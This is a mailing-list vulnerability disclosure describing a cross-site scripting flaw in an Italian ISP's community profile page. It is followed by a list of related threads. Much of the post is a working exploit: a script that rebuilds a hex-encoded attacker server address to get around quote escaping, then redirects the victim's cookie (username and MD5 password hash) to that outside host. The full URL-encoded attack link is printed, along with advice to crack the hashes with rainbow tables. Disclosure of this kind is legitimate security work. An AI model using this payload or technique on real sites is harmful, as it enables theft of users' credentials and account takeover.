[Full-disclosure] Libero.it (italian ISP) XSS vulnerability

Libero.it, one of the most important italian ISP (www.libero.it) is
affected from a XSS vulnerability.
The vulnerability can be found in the "Community" section of Libero
portal, and the affected functionality is "add nick" (
http://digiland.libero.it/profilo.phtml?nick=).
The implementation of this functionality allows the injection of
malicious code in the URL, so that an attacker can steal username and
password of the victim accessing his cookie.

The normal URL would be something linke this:

http://digiland.libero.it/profilo.phtml?nick=mickey

where "mickey" is the name of the nick i'd like to add to mu buddy list.

Trough a simple XSS locator can be found that the page is vulnerable
to the XSS vector:
http://digiland.libero.it/profilo.phtml?nick=%3cIMG%20SRC=javascript:alert(document.cookie
)>

The cookie showed contains the victim username and password (used for
both the Community and the Webmail): the username is stored
in plain text while the password is hashed with md5 algorithm (most
password are 5-6 char long and can be decrypted using a
md5-rainbowtables approach)

A more crafted URL makes possible to automatically post victim cookies
to a remote server.

A simple parsing of the URL is done by the web application, so that
quote and double-quote (' and ") chars are escaped by putting a \
before of them (both using ASCII and URL encoding).
So it's a bit tricky to pass in the XSS URL the remote server URL and
the cookie.
This control can be avoided constructing the remote server URL from
inside the web application logic

- the attacker remote base url is encoded using URL encoding and the %
char is removed: (http://82.53.175.227:8080/sample/hello?c= -->

687474703A2F2F38322E35332E3137352E3232373A383038302F73616D706C652F68656C6C6F3F633D)

- the following script can be easily attached to the webapp url:


<script>
c=document.cookie;
pcent=/%/.source;
str=/687474703A2F2F38322E35332E3137352E3232373A383038302F73616D706C652F68656C6C6F3F633D/.source;
temp=str.substring(0,0);
for(i=0;i<str.length;i+=2){temp+=pcent+str.substring(i,i+2)};
tot=unescape(temp)+c;
document.location.href=tot;
</script>

(on some browser the "eval()" method must be applied on "tot")

- the so composed script is URL encoded and attached to the webapp URL:
http://digiland.libero.it/profilo.phtml?nick=%3C%73%63%72%69%70%74%3E%0D%0A%63%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%0D%0A%70%63%65%6E%74%3D%2F%25%2F%2E%73%6F%75%72%63%65%3B%0D%0A%73%74%72%3D%2F%36%38%37%34%37%34%37%30%33%41%32%46%32%46%33%38%33%32%32%45%33%35%33%33%32%45%33%31%33%37%33%35%32%45%33%32%33%32%33%37%33%41%33%38%33%30%33%38%33%30%32%46%37%33%36%31%36%44%37%30%36%43%36%35%32%46%36%38%36%35%36%43%36%43%36%46%33%46%36%33%33%44%2F%2E%73%6F%75%72%63%65%3B%0D%0A%74%65%6D%70%3D%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%30%29%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%74%72%2E%6C%65%6E%67%74%68%3B%69%2B%3D%32%29%7B%74%65%6D%70%2B%3D%70%63%65%6E%74%2B%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%69%2C%69%2B%32%29%7D%3B%0D%0A%74%6F%74%3D%75%6E%65%73%63%61%70%65%28%74%65%6D%70%29%2B%63%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%74%6F%74%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E
Greetings,

Rosario Valotta

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • [VulnWatch] Libero.it (italian ISP) XSS vulnerability
    ... The vulnerability can be found in the "Community" section of Libero ... password of the victim accessing his cookie. ... Trough a simple XSS locator can be found that the page is vulnerable ... to a remote server. ...
    (VulnWatch)
  • Re: [Full-disclosure] on xss and its technical merit
    ... detailed technical knowledge of all things xss. ... other's attacks since then. ... "Saying XSS isn't a vulnerability is like like saying a binary that ... (javascript is ONE scripting language and therefore NOT a requirement)). ...
    (Full-Disclosure)
  • Re: [Full-disclosure] on xss and its technical merit
    ... "Saying XSS isn't a vulnerability is like like saying a binary that has a ... "XSS needs javascript, binary needs its own malcode as well." ... (javascript is ONE scripting language and therefore NOT a requirement)). ...
    (Full-Disclosure)
  • [Full-disclosure] dt_guestbook version 1.0f XSS vulnerability
    ... fully-featured message board system with admin interface. ... flaws it is possible for the remote attacker to conduct XSS attacks. ... This vulnerability can be exploited only when PHP register_globals is ... Vulnerability Impact: Attack ...
    (Full-Disclosure)
  • [VulnWatch] Re: New Web Vulnerability - Cross-Site Tracing
    ... then it could pose a significant threat. ... >and the involvement of three parties in XSS (attacker, victim, ... As specific issues in widely-deployed pieces of software become less common, attacks against application components will become more common. ... >But that should only affect how XSS is prioritized as a vulnerability ...
    (VulnWatch)